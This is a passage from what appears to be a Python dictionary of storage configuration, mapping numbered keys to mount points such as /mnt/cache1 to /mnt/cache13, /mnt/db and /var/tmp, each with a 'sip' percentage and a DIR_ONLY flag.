'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'4-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'9-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'7-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'7-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'7-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'7-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'11-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'11-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'11-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'11-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'11-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'11-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'11-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'0-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'12-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'11-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'11-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'12-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'4-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'4-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-4': {'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'7-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'4-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'4-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'4-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'5-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-0': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'4-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'11-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'11-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'11-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'11-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
